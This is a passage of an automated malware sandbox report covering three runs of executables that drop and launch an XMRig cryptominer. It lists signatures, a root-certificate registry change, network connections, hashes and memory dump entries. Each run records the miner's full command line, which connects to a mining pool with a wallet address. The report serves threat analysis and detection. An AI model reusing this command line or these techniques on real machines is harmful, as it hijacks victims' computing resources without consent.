memory/1824-79-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-80-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-81-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-82-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-83-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-84-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:06
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data omitted] | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data omitted] | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2324 wrote to memory of 1624 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2324 wrote to memory of 1624 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1624-16-0x00000219DFFD0000-0x00000219DFFF0000-memory.dmp
memory/1624-17-0x0000021A73B40000-0x0000021A73B60000-memory.dmp
memory/1624-18-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-19-0x0000021A73F80000-0x0000021A73FA0000-memory.dmp
memory/1624-20-0x0000021A741B0000-0x0000021A741D0000-memory.dmp
memory/1624-21-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-22-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-25-0x0000021A741B0000-0x0000021A741D0000-memory.dmp
memory/1624-24-0x0000021A73F80000-0x0000021A73FA0000-memory.dmp
memory/1624-23-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-26-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-27-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-28-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-29-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-30-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-31-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-32-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-33-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-34-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-35-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-36-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-37-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-38-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-39-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-40-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-41-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-42-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-43-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-44-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-45-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-46-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-47-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-48-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-49-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-50-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-51-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-52-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-53-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-54-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-55-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-56-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-57-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-58-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-59-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-60-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-61-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-62-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-63-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-64-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-65-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-66-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-67-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-68-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-69-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-70-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-71-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-72-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-73-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-74-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-75-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-76-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-77-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-78-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-79-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-80-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-81-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-82-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-83-0x00007FF614620000-0x00007FF615123000-memory.dmp
memory/1624-84-0x00007FF614620000-0x00007FF615123000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:07
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data omitted] | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2612 wrote to memory of 4056 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2612 wrote to memory of 4056 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.239.69.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4056-16-0x0000024D6F110000-0x0000024D6F130000-memory.dmp
memory/4056-17-0x0000024D70880000-0x0000024D708A0000-memory.dmp
memory/4056-18-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-19-0x0000024D708C0000-0x0000024D708E0000-memory.dmp
memory/4056-20-0x0000024D708A0000-0x0000024D708C0000-memory.dmp
memory/4056-21-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-22-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-25-0x0000024D708A0000-0x0000024D708C0000-memory.dmp
memory/4056-24-0x0000024D708C0000-0x0000024D708E0000-memory.dmp
memory/4056-23-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-26-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-27-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-28-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-29-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-30-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-31-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-32-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-33-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-34-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-35-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-36-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-37-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-38-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-39-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-40-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-41-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-42-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-43-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-44-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-45-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-46-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-47-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-48-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-49-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-50-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-51-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-52-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-53-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-54-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-55-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-56-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-57-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-58-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-59-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-60-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-61-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-62-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-63-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-64-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-65-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-66-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-67-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-68-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-69-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-70-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-71-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-72-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-73-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-74-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-75-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-76-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-77-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-78-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-79-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-80-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-81-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-82-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-83-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-84-0x00007FF733880000-0x00007FF734383000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:53
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4288 wrote to memory of 1460 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4288 wrote to memory of 1460 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4036,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4028 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1392,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=2132 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1460-16-0x0000026676BE0000-0x0000026676C00000-memory.dmp
memory/1460-17-0x00000266784E0000-0x0000026678500000-memory.dmp
memory/1460-18-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-20-0x0000026678500000-0x0000026678520000-memory.dmp
memory/1460-21-0x0000026678520000-0x0000026678540000-memory.dmp
memory/1460-19-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-22-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-24-0x0000026678500000-0x0000026678520000-memory.dmp
memory/1460-23-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-25-0x0000026678520000-0x0000026678540000-memory.dmp
memory/1460-26-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-27-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-28-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-29-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-30-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-31-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-32-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-33-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-34-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-35-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-36-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-37-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-38-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-39-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-40-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-41-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-42-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-43-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-44-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-45-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-46-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-47-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
